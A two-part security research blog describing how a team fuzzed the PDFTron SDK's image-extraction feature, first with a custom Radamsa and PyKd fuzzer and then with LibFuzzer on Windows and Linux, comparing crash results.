Hope you enjoyed reading this post :) See you in @Hack!

Applying Fuzzing Techniques Against PDFTron: Part </a#x3E;2

Haboob

Haboob Research Team

19 October 2021 at 09:59

Introduction

In our first blog we covered the basics of how we fuzzed PDFtron using python. The results were quite interesting and yielded multiple vulnerabilities. Even with the number of the vulnerabilities we found, we were not fully satisfied. We eventually decided to take it a touch further by utilizing LibFuzzer against PDFTron.

Throughout this blog post, we will attempt to document our short journey with LibFuzzer, the successes and failures. Buckle up, here we go..

Overview

LibFuzzer is part of the LLVM package. It allows you to integrate the coverage-guided fuzzer logic into your harness. A crucial feature of LibFuzzer is its close integration with Sanitizer Coverage and bug detecting sanitizers, namely: Address Sanitizer (ASAN), Leak Sanitizer, Memory Sanitizer (MSAN), Thread Sanitizer (TSAN) and Undefined Behaviour Sanitizer (UBSAN).

The first step into integrating LibFuzzer in your project is to implement a fuzz target function – which is a function that accepts an array of bytes that will be mutated by LibFuzzer’s function (LLVMFuzzerTestOneInput):

When we integrate a harness with the function provided by LibFuzzer (LLVMFuzzerTestOneInput()), which is Libfuzzer's entry point, we can observe how LibFuzzer works internally.

Recent versions of Clang (starting from 6.0) includes LibFuzzer without having to install any dependencies. To build your harness with the integrated LibFuzzer function, use the -fsanitize=fuzzer flag during the compilation and linking. In some cases, you might want to combine LibFuzzer with AddressSanitizer (ASAN), UndefinedBehaviorSanitizer (UBSAN), or both. You can also build it with MemorySanitizer (MSAN):

In our short research, we used more options to build our harness since we targeted PDFTron, specifically to satisfy dependencies (header files etc..)

To properly benchmark our results, we decided to build the harness on both Linux and Windows.

Libfuzzer on Windows

To compile the harness, first, we need to download the LLMV package which contains the Clang compiler. To acquire a LLVM package, you can download it from the LLVM Snapshot Builds page (Windows).

Building the Harness - Windows:

To get accurate results and make the comparison fair, we targeted the same feature(s) we fuzzed during part1 (ImageExtract), which can be downloaded from here. PDFTron provides multiple implementations of their features in various programming languages, we went with the C++ implementation since our harness was developed in the same language.

When reviewing the source code sample for ImageExtract, we found the PDFDoc constructor, which by default takes the path for the PDF file we want to extract the images from. This constructor works perfectly in our custom fuzzer since our custom fuzzer was a file-based fuzzer. However, LibFuzzer is completely different since it’s an in-memory based fuzzer and it provides mutated test cases in-memory through LLVMFuzzerTestOneInput.

If PDFTron’s implementation of ImageExtract had only the option to extract an image from a PDF file in disk, we can easily workaround this constraint by using a simple trick:

dumping the test cases that LibFuzzer generated into the disk then pass it to the PDFDoc constructor.

Using this technique will reduce the overall performance of the fuzzer. You will always want to avoid using files and I/O operations as they’re the slowest. So, using such workarounds should always be a last resort.

In our search for an alternative solution (since I/O operations are lava!) we inspected the source code of the ImageExtract feature and in one of its headers we found multiple implementations for the PDFDoc constructor. One of the implementations was so perfect for us, we thought it was custom-made for our project.

The constructor accepts a buffer and its size (which will be provided by LibFuzzer). So, now we can use the new constructor in our harness without any performance penalties and minimal changes to our code.

Now all we have to do is change ImageExtract sample source code main function from accepting one argument (file path) to two arguments (buffer and size) then add the entry point function for LibFuzzer.

At this point our harness is primed and ready to be built.

Compiling and Running the Harness - Windows

Before compiling our harness, we need to provide the static library that PDFTron uses. We also need to provide PDFTron’s headers path to Clang so we can compile our harness without any issues. The options are:

-L : Add directory to library search path
-l : Name of the library
-I : Add directory to include search path.

The last option that we need to add is the harness fsanitize=fuzzer to enable fuzzing in our harness.

To run the harness, we need to provide the corpus folder that contains the initial test-cases that we want LibFuzzer to start mutating.

We tested the fsanitize=fuzzer,address (Address Sanitizer) option to see if our fuzzer would yield more crashes, but we realized that address sanitization was not behaving as it should under Windows. We ended up running our harness without the address sanitizer. We managed to trigger the same crashes we previously found using our custom fuzzer (part 1).

LibFuzzer on Linux

Since PDFTron also supports Linux, we decided to test run LibFuzzer on Linux so we can run our harness with the Address Sanitizer option enabled. We also targeted the same feature (ImageExtract) to avoid making any major changes. The only significant changes were the options provided during the build time.

Compiling and Running the Harness - Linux

The options that we used to compile the harness on Linux are pretty much the same as on Windows. We need to provide the headers path and the library PDFTron used:

-L : Add directory to library search path
-l : Name of the library (without .so and lib suffix)
-I : Add directory to the end of the list of include search paths

Now we need to add fuzzer option and the address option as an argument for -fsanitize value to enable fuzzing and the Address Sanitizer:

Our harness is now ready to roll. To keep our harness running, we had to add these two arguments on Linux:

-fork=1
-ignore_crashes=1

The -fork option allows us to spawn a concurrent child and provides it with a small random subset of the corpus.

The -ignore_crashes options allows Libfuzzer to continue running without exiting when a crash occurs.

After running our harness over a short period of time, we discovered 10 unique crashes in PDFTron.

Conclusion:

Throughout our small research, we were able to uncover new vulnerabilities along with triggering the old ones we discovered previously.

Sadly, LibFuzzer under Windows does not seem to be fully mature yet to be used against targets like PDFTron. Nevertheless, using LibFuzzer on Linux was easy and stable.

Hope you enjoyed the short journey, until next time!

Happy hunting!

Resource

Applying Fuzzing Techniques Against PDFTron: Part </a#x3E;2

Applying Fuzzing Techniques Against PDFTron: Part 1

Haboob

Haboob Research Team

5 October 2021 at 11:51

Introduction:

PDFTron SDK brings a wide variety of PDF parsing functionalities. It varies from reading and viewing PDF files to converting PDF files to different file formats. The provided SDK is widely used and supports multiple platforms, it also exposes a rich set of APIs that helps in automating PDFTron functionalities.

PDFtron was one of the targets we started looking into since we decided to investigate PDF readers and PDF convertors. Throughout this blog post, we will discuss the brief research that we did.

The blog will discuss our efforts which will break down the harnessing and fuzzing of different PDFTron functionalities.

How to Tackle the Beast: CLI vs Harnessing:

Since PDFTron provides well documented CLI’s, it was the obvious route for us to go, we considered this as a low-hanging fruit. Our initial thinking was to pick a command, try to craft random PDF files and feed them to the specific CLI, such as pdf2image. We were able to get some crashes this way, we thought it can’t get any better, right? Right???

But after a while, we wanted to take our project a step further, by developing a costume harness using their publicly available SDK.

Lucky enough, we found a great deal of projects on their website which includes small programs that were developed in C++, just ripe and ready to be compiled and executed. Each program does a very specific function, such as adding an image to a PDF file, extracting an image from a PDF file, etc.

We could easily integrate those code snippets into our project, feed them mutated inputs and monitor their execution.

For example, we harnessed the extract image functionality, but also we did minor modifications to the code by making it take two arguments:

1. The mutated file path.

2. Destination to where we want the image to be extracted.

Following are the edited parts of PDFTron’s code:

How Does our Fuzzer Work?

We developed our own custom fuzzer that uses Radamsa as a mutator, then feed the harness the mutated files while monitoring the execution flow of the program. If and when any crash occurs, the harness will log all relative information such as the call stack and the registers state.

What makes our fuzzer generic, is that we made a config file in JSON format, that we specify as the following:

1- Mutation file format.

2- Harness path.

3- Test-cases folder path.

4- Output folder path.

5- Mutation tool path.

6- Hashes file path.

We fill these fields in based on our targeted application, so we don’t have to change our fuzzer source code for each different target.

The Components:

We divided the fuzzer into various components, each component has a specific functionality, the components of our fuzzer were:

A. Test Case Generator: Handled by Radamsa.

B. Execution Monitor: Handled by PyKd.

C. Logger: Costume built logger.

D. Duplicate Handler: Handled by !exploitable Toolkit.

We will go over each component and our way of implementing it in details in the next section.

A. Test Case Generator:

As mentioned before, we used Radamsa as our test case generator (mutation-based), so we integrated it with our fuzzer mainly due to it supporting a lot of mutation types, which saves plenty of time on reimplementing and optimizing some mutation types.

we also listed some of the mutation types that Radamsa supports and stored it in a list to get a random mutation type each time.

After generating the list, we need to place Radamsa’s full command to start generating the test cases after specifying all the arguments needed:

Now we got the test cases at the desired destination folder, each time we execute this function Radamsa generates 20 mutated files which later will be fed to the targeted application.

B. Execution Monitor:

This part is considered as the main component in our fuzzer, it contains three main stages:

1. Test case running stage.

2. Program execution stage.

3. Logging stage.

After we prepared the mutated files, we can now test them on the selected target. In our fuzzer, we used PyKd library to execute and check the harness’ execution progress. If the harness terminates the execution normally, our fuzzer will test the next mutated file, and if our harness terminates the execution due to access valuation our fuzzer will deal with it (more details on this later).

PyKd will run the harness and will use the expHandler variable to check the status of the harness execution. The fuzzer will decide whether a crash happened to the harness or not. We create a class called ExceptionHandler which monitors the execution flow of our harness, it checks exception flag, if the value is 0xC0000005, its usually a promising bug.

If accessViolationOccured was set to true, our fuzzer will save the mutated file for us to analyze it later, if it was set to false, that means the mutated file did not affect the harness execution and our harness will test another file.

C. Logging:

This component is crucial in any fuzzing framework. The role of the logger is to log a file that briefly details the crash and saves the mutated file that triggered the crash. Some important details you might want to include in a log:

- Assembly instruction before the crash.

- Assembly instruction where the crash occurred.

- Registries states.

- Call stack.

After fetching all information we need from the crash, now we can write it into a log file. To avoid naming duplication problems, we saved both the test case that triggered the crash and the log file with the epoch time as their file names.

This code snippet saves the PoC that triggered the crash and creates a log file related to the crash in our disk for later analysis.

D. Duplicate Handler:

After running the fuzzer over long periods of time, we found that the same crash may occur multiple times, and it will be logged each time it happens. Making it harder for us to analyse unique crashes. To control duplicate crashes, we used “MSEC.dll”, which is created by the Microsoft Security Engineering Center (MSEC).

We first need to load the DLL to WinDbg.

Then we used a tool called “!exploitable”, this tool will generate a unique hash for each crash along with crash analysis and risk assessment. Each time the program crashes, we will run this tool to get the hash of the crash and compare it to the hashes we already got before. If it matches one of the hashes, we will not save a log for this crash. If it’s a unique hash, we will store the new hash with previous crash hashes we discovered before and save a log file for the new crash with it’s test case.

In the second part of this blogpost, we will discuss integrating the harness with a publicly available fuzzer and comparing the results between these two different approaches.

Stay tuned, and as always, happy hunting!